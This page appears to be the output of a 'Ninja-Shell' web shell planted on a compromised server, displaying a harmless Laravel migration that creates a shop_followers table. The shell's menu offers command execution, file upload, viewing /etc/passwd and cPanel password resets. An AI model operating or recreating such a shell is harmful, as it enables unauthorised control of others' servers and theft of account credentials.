{Ninja-Shell}
Home
Info
Upload
Command
View /etc/passwd
cPanel Reset Password
Filename: /var/www//arsu/database///migrations//2023_04_17_095721_create_shop_followers_table.php
<?php use Illuminate\Database\Migrations\Migration; use Illuminate\Database\Schema\Blueprint; use Illuminate\Support\Facades\Schema; class CreateShopFollowersTable extends Migration { /** * Run the migrations. * * @return void */ public function up() { Schema::create('shop_followers', function (Blueprint $table) { $table->id(); $table->integer('shop_id'); // Shop Table (Shop ID) $table->integer('user_id')->comment('Customer ID'); // User Table (Customer ID) $table->timestamps(); }); } /** * Reverse the migrations. * * @return void */ public function down() { Schema::dropIfExists('shop_followers'); } }
./Ninja\.